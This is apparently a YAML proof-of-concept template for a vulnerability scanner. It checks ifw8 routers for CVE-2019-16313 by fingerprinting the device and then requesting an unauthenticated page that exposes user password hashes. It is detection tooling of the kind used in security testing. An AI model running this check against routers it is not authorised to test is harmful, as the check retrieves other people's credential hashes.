name: poc-yaml-ifw8-router-cve-2019-16313
rules:
  - method: GET
    path: >-
      /index.htm?PAGE=web
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
  - method: GET
    path: >-
      /action/usermanager.htm
    follow_redirects: false
    expression: >
      response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "v4.31"
  links:
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313
    - http://www.iwantacve.cn/index.php/archives/311/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16312